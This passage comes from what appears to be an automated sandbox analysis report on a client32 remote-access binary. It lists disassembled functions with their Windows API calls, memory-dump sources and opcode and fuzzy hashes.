Yara matches
Similarity
• API ID: HandleLibraryLoadModule
• String ID: NSMTRACE
• API String ID: 4133054770-4175627554
• Opcode ID: 149a01f821d4e18d225a109ec96b21c3577f6115cbc4ffed0645b8b98fb3f485
• Instruction ID: 05ea96992fd141bf150828de6ed923b008e63955592f075fac88204ac5220611
• Opcode Fuzzy Hash: 149a01f821d4e18d225a109ec96b21c3577f6115cbc4ffed0645b8b98fb3f485
• Instruction Fuzzy Hash: 57D05B76641637CFDF069FB555A0575F7E4EB0AA0D3140075E425C7A06EB61D408C751
APIs
• LoadLibraryA.KERNEL32(psapi.dll,?,6CA88DC8), ref: 6CA84F78
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
• Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
Yara matches
Similarity
• API ID: LibraryLoad
• String ID: psapi.dll
• API String ID: 1029625771-80456845
• Opcode ID: 6f04d9182a66cf670745a9bcdb868c243e301c4059560a16be80fd8ebb6d3a34
• Instruction ID: 41be6b52bb404a859ee517f6f4167e4430874b45a0f81b8c1c430da07aa341c8
• Opcode Fuzzy Hash: 6f04d9182a66cf670745a9bcdb868c243e301c4059560a16be80fd8ebb6d3a34
• Instruction Fuzzy Hash: 13E001B1A01B118F83B0CF3AA504642BAF0BB086503118E2E90AEC3A00E330AA858F90
APIs
• LoadLibraryA.KERNEL32(psapi.dll,?,11030964), ref: 110262C8
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: LibraryLoad
• String ID: psapi.dll
• API String ID: 1029625771-80456845
• Opcode ID: b8f5042798fcb06a98c932a958d15ff0d02573e45559d2e155fe0703e5da3d60
• Instruction ID: e72f5ce5ea606eebe772e5127c5e47cd0fc6cc19585cdbbc80c25ff44c20045f
• Opcode Fuzzy Hash: b8f5042798fcb06a98c932a958d15ff0d02573e45559d2e155fe0703e5da3d60
• Instruction Fuzzy Hash: 50E009B1A01B258FC3B0CF3AA544642BAF0BB086103118A7ED0AEC3A04F330A5448F80
APIs
• LoadLibraryA.KERNEL32(nslsp.dll,00000000,1102F63D,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client,Bridge), ref: 1101553E
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: LibraryLoad
• String ID: nslsp.dll
• API String ID: 1029625771-3933918195
• Opcode ID: e245dc8b85a007af01e470ee7c18d2676676128a69ad62e56e432da1ca6298b9
• Instruction ID: c3cee1b6b22d45073264887edccfc8dbbb46eef3a7360ad418ef0f3f90be1ef1
• Opcode Fuzzy Hash: e245dc8b85a007af01e470ee7c18d2676676128a69ad62e56e432da1ca6298b9
• Instruction Fuzzy Hash: BBC08C702006245BE3900F48BC04081F694AF04900300882AE070C3600D160A8008F80
APIs
• _memset.LIBCMT ref: 110750EF
• FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,0000000B,?), ref: 11075159
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: FreeLibrary_memset
• String ID:
• API String ID: 1654520187-0
• Opcode ID: 4e56bc08cf6d4b85bc31047bf59587d3794f3c6155dff5afacd053865e97b66c
• Instruction ID: 75615663fc9b5e204bff5cdf828812fccbd9a8c0715bb2e01743ee940980502e
• Opcode Fuzzy Hash: 4e56bc08cf6d4b85bc31047bf59587d3794f3c6155dff5afacd053865e97b66c
• Instruction Fuzzy Hash: 28219276E01268A7D710DE95EC41BEFBBBCFB44315F4041AAE90997200EB729A50CBE1
APIs
• ioctlsocket.WSOCK32(935334B3,4004667F,00000000,-000397EB), ref: 6CA85D1F
• select.WSOCK32(00000001,?,00000000,?,00000000,935334B3,4004667F,00000000,-000397EB), ref: 6CA85D62
Memory Dump Source
• Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
• Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
Yara matches
Similarity
• API ID: ioctlsocketselect
• String ID:
• API String ID: 1457273030-0
• Opcode ID: 1fd7969afed725e80ce2029ea9298727c180068e3e744874c565cda21f2a9fb2
• Instruction ID: 8ae1053217584a821d034c745da89eadc71e9e56b402b095ef44b4970b253ebb
• Opcode Fuzzy Hash: 1fd7969afed725e80ce2029ea9298727c180068e3e744874c565cda21f2a9fb2
• Instruction Fuzzy Hash: 51213070A012189BEB28CF58C9587EDB7B9EF48304F0081DAA90E97681DB745FD9DF90
APIs
  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
• std::exception::exception.LIBCMT ref: 110608C3
• __CxxThrowException@8.LIBCMT ref: 110608D8
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
• String ID:
APIs
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: _malloc_memmove
• String ID:
APIs
• _memset.LIBCMT ref: 110886DF
• InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,11070CC3,00000000,00000000,11182F3E,000000FF), ref: 11088750
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CriticalInitializeSection_memset
• String ID:
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11145031
• ExtractIconExA.SHELL32(?,00000000,000F02BB,00050289,00000001), ref: 11145068
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ExtractFileIconModuleName
• String ID:
APIs
  • Part of subcall function 1116A1AF: __getptd_noexit.LIBCMT ref: 1116A1AF
• __lock_file.LIBCMT ref: 11164CBE
  • Part of subcall function 1116BE59: __lock.LIBCMT ref: 1116BE7E
• __fclose_nolock.LIBCMT ref: 11164CC9
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: __fclose_nolock__getptd_noexit__lock__lock_file
• String ID:
                                                                                                                                                    • API String ID: 2800547568-0
                                                                                                                                                    • Opcode ID: 271288d31555c81154ec7293090fb485e1e9931888df87aecff959c56407cd41
                                                                                                                                                    • Instruction ID: afac539be2367be23e5fb54bb350a7e23aa7a519b2fcc5708fa11322496ce6e3
                                                                                                                                                    • Opcode Fuzzy Hash: 271288d31555c81154ec7293090fb485e1e9931888df87aecff959c56407cd41
                                                                                                                                                    • Instruction Fuzzy Hash: B4F0F0358017138AD7109B78CC0078EFBE96F0133CF1182088434AA6D4CBFA6521DB46
                                                                                                                                                    APIs
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 6CA96C26
                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 6CA96C5B
                                                                                                                                                      • Part of subcall function 6CA96940: GetTickCount.KERNEL32 ref: 6CA96950
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CountTick$Sleep
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4250438611-0
                                                                                                                                                    • Opcode ID: 8293aced150113f9e3f74cde333c4431c805f00f7975c79a82665e91f9b2bd15
                                                                                                                                                    • Instruction ID: 21455ad817fda5ae90745712e72cd60681879e0ac366a9825cdcadb6a87acb13
                                                                                                                                                    • Opcode Fuzzy Hash: 8293aced150113f9e3f74cde333c4431c805f00f7975c79a82665e91f9b2bd15
                                                                                                                                                    • Instruction Fuzzy Hash: 7FF03A7171420A8BCF5CEB75964A358B2F2EF5235DF16412AD412D6B80C7758ACAC681
                                                                                                                                                    APIs
                                                                                                                                                    • __lock.LIBCMT ref: 11176045
                                                                                                                                                      • Part of subcall function 1117459F: __mtinitlocknum.LIBCMT ref: 111745B5
                                                                                                                                                      • Part of subcall function 1117459F: __amsg_exit.LIBCMT ref: 111745C1
                                                                                                                                                      • Part of subcall function 1117459F: EnterCriticalSection.KERNEL32(?,?,?,1116C592,0000000D), ref: 111745C9
                                                                                                                                                    • __tzset_nolock.LIBCMT ref: 11176056
                                                                                                                                                      • Part of subcall function 1117594C: __lock.LIBCMT ref: 1117596E
                                                                                                                                                      • Part of subcall function 1117594C: ____lc_codepage_func.LIBCMT ref: 111759B5
                                                                                                                                                      • Part of subcall function 1117594C: __getenv_helper_nolock.LIBCMT ref: 111759D7
                                                                                                                                                      • Part of subcall function 1117594C: _free.LIBCMT ref: 11175A0E
                                                                                                                                                      • Part of subcall function 1117594C: _strlen.LIBCMT ref: 11175A15
                                                                                                                                                      • Part of subcall function 1117594C: __malloc_crt.LIBCMT ref: 11175A1C
                                                                                                                                                      • Part of subcall function 1117594C: _strlen.LIBCMT ref: 11175A32
                                                                                                                                                      • Part of subcall function 1117594C: _strcpy_s.LIBCMT ref: 11175A40
                                                                                                                                                      • Part of subcall function 1117594C: __invoke_watson.LIBCMT ref: 11175A55
                                                                                                                                                      • Part of subcall function 1117594C: _free.LIBCMT ref: 11175A64
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1828324828-0
                                                                                                                                                    • Opcode ID: e9fe97314170dd3ace1c63e43c84978c6283960cf81703fd067dc8cc761c8193
                                                                                                                                                    • Instruction ID: d808ca63efd1e9ffab5fb640758e365785c4d1c524b5d003c7d68937386cb31b
                                                                                                                                                    • Opcode Fuzzy Hash: e9fe97314170dd3ace1c63e43c84978c6283960cf81703fd067dc8cc761c8193
                                                                                                                                                    • Instruction Fuzzy Hash: 7AE05B7E8877B3DAE7139FB4469060CF670AB05B3EF6011E5D060556C4CF701555C792
                                                                                                                                                    APIs
                                                                                                                                                    • WSACancelBlockingCall.WSOCK32 ref: 6CA863A9
                                                                                                                                                    • Sleep.KERNEL32(00000032), ref: 6CA863B3
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: BlockingCallCancelSleep
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3706969569-0
                                                                                                                                                    • Opcode ID: 04baabd1e2eb82d48990de942721d7e1855566f3ecc6de2a81864de4c2bdba35
                                                                                                                                                    • Instruction ID: 22cdbfe6d138d98c78dcbd41094adbf8da53edf449e7302c9742fd8d8c9564f4
                                                                                                                                                    • Opcode Fuzzy Hash: 04baabd1e2eb82d48990de942721d7e1855566f3ecc6de2a81864de4c2bdba35
                                                                                                                                                    • Instruction Fuzzy Hash: A6B092A03A32629ABB0513B10A0E3AA21988F8424BF6544602B41C9A85EF20C289A021
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 11145990: ExpandEnvironmentStringsA.KERNEL32(000000FF,?,00000104,000000FF), ref: 111459B7
                                                                                                                                                      • Part of subcall function 11164EAD: __fsopen.LIBCMT ref: 11164EBA
                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,000000FF,?), ref: 11145AA5
                                                                                                                                                    • Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,000000FF,?), ref: 11145AB5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3768737497-0
                                                                                                                                                    • Opcode ID: a3a7e4752acc607997ac4dc0a72fcac428bfa81aec4d9fb6ca4c049ea981d30d
                                                                                                                                                    • Instruction ID: 034c310a398a014eacf4d95463f41bd89d414178975837bd0fbb5aed6b89dd46
                                                                                                                                                    • Opcode Fuzzy Hash: a3a7e4752acc607997ac4dc0a72fcac428bfa81aec4d9fb6ca4c049ea981d30d
                                                                                                                                                    • Instruction Fuzzy Hash: E8110476940319ABEB119F90CDC4A6FF3B8EF85A29F300165EC0097A00D775AD51C7A2
                                                                                                                                                    APIs
                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 11010B94
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: LockitLockit::_std::_
• String ID:
• API String ID: 3382485803-0
• Opcode ID: 900fd30ae7a6edcb6a0dfa434b7c013aaa35b72064ad6defd4f97f4d13ad8da4
• Instruction ID: 6fbf298b81733ad5c02794b6394837a2ddc0a350229d48e3ddb53e27456ddbdc
• Opcode Fuzzy Hash: 900fd30ae7a6edcb6a0dfa434b7c013aaa35b72064ad6defd4f97f4d13ad8da4
• Instruction Fuzzy Hash: F1516B74A00649DFDB04CF98C980AADFBF5BF89318F248298D5469B385C776E942CB90
APIs
• RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,76968400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: QueryValue
• String ID:
• API String ID: 3660427363-0
• Opcode ID: 91328a05fa49adc7f96a877065892eb549607f162fa4bf6631575699f60be126
• Instruction ID: ee220ac459adc96ef86e18eb3808082b68f6554a37139a9005b103db31ef1b78
• Opcode Fuzzy Hash: 91328a05fa49adc7f96a877065892eb549607f162fa4bf6631575699f60be126
• Instruction Fuzzy Hash: 2611B97171C2795FEB15CE46D690AAEFB6AEBC5F14F30816BE51947D00C332A482C754
APIs
• GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,?), ref: 110FB49D
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: InformationToken
• String ID:
• API String ID: 4114910276-0
• Opcode ID: 2187bc4dd0207f2c4cff668421eac79af3382fb4f4e0b6f0c948954ee106bd6b
• Instruction ID: 0dd0dc8a76de1486b7c0157bd4876b78410922a839ecfb631160e4ccf4e8658d
• Opcode Fuzzy Hash: 2187bc4dd0207f2c4cff668421eac79af3382fb4f4e0b6f0c948954ee106bd6b
• Instruction Fuzzy Hash: E1118671A0055D9BDB11CFA8DD51BEEB3E8DB48309F0041D9E9499B340EA70AE488B90
APIs
• RtlAllocateHeap.NTDLL(00000008,6CAA6F16,00000000,?,6CAAD40B,00000001,6CAA6F16,00000000,00000000,00000000,?,6CAA6F16,00000001,00000214), ref: 6CAAA0C5
  • Part of subcall function 6CAA60F9: __getptd_noexit.LIBCMT ref: 6CAA60F9
Memory Dump Source
• Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
Yara matches
Similarity
• API ID: AllocateHeap__getptd_noexit
• String ID:
• API String ID: 328603210-0
• Opcode ID: 2175fa6a22c984be814c4106b3a5bdf9138bc65f477dc8c5530993c2cea7c540
• Instruction ID: 5a52a631336030e813da83616b96e7bb8f451ac851986d75b80517d12cc239a8
• Opcode Fuzzy Hash: 2175fa6a22c984be814c4106b3a5bdf9138bc65f477dc8c5530993c2cea7c540
• Instruction Fuzzy Hash: 0101B9313453129EEB158EA6CC14B5737E6AB41368F188519D815DB980D7759C82CF40
APIs
• RtlAllocateHeap.NTDLL(00000008,1103179F,00000000,?,1116AC94,?,1103179F,00000000,00000000,00000000,?,1116C627,00000001,00000214,?,1111023E), ref: 11171007
  • Part of subcall function 1116A1AF: __getptd_noexit.LIBCMT ref: 1116A1AF
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: AllocateHeap__getptd_noexit
• String ID:
• API String ID: 328603210-0
• Opcode ID: 5134503a2c8da02e36f93c83ba404df5dd22f98f66039dab1883123dd78627a5
• Instruction ID: 2763c535338e1a2717ceb9c309c83b7f036f5409daf397f77e32ba57fb3352a5
